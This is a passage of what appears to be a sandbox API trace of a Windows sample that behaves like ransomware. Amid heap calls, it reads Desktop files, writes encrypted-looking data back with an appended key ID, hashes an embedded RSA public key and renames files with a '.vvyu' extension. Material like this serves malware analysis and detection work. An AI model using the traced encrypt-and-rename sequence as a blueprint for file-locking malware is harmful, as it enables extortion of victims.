(HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7f8 [0183.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e798 [0183.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0183.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7b0 [0183.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e780 [0183.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e810 [0183.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0183.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7e0 [0183.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7c8 [0183.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e828 [0183.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7c8 [0183.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0183.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e798 [0183.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0183.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0183.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0183.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0183.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30ef8 | out: hHeap=0x6a0000) returned 1 [0183.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0183.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0183.693] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x102d1, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x102d1, lpOverlapped=0x0) returned 1 [0183.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0183.697] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x102d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.697] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0183.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0183.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.698] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0183.699] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.699] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.699] CloseHandle (hObject=0x584) returned 1 [0183.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0183.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d41908 [0183.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.701] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\FDSFO0.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\fdsfo0.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\FDSFO0.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\fdsfo0.avi.vvyu")) returned 1 [0183.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.703] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.706] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbeac7d00, ftCreationTime.dwHighDateTime=0x1d8a051, ftLastAccessTime.dwLowDateTime=0x64ea29d0, ftLastAccessTime.dwHighDateTime=0x1d8a564, ftLastWriteTime.dwLowDateTime=0x64ea29d0, ftLastWriteTime.dwHighDateTime=0x1d8a564, nFileSizeHigh=0x0, nFileSizeLow=0xa011, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fjAnz4 q_5C_daasZw.ots", cAlternateFileName="FJANZ4~1.OTS")) returned 1 [0183.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30ef8 [0183.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0183.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30ef8 | out: hHeap=0x6a0000) returned 1 [0183.706] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\fjAnz4 q_5C_daasZw.ots") returned=".ots" [0183.707] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fjAnz4 q_5C_daasZw.ots" (normalized: "c:\\users\\keecfmwgj\\desktop\\fjanz4 q_5c_daaszw.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.707] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=40977) returned 1 [0183.707] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.710] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9feb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.710] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.712] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.712] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xa011, lpOverlapped=0x0) returned 1 [0183.713] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.713] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.713] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.713] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.714] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.714] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.714] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.714] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.714] GetLastError () returned 0x0 [0183.714] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.714] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.715] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.715] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.715] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa010) returned 0x2d43778 [0183.715] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0183.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0183.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30ef8 [0183.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e768 [0183.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30f40 [0183.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e780 [0183.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7b0 [0183.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e810 [0183.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7c8 [0183.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0183.717] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0183.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0183.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e810 [0183.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0183.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7c8 [0183.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e7b0 [0183.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0183.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0183.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.719] 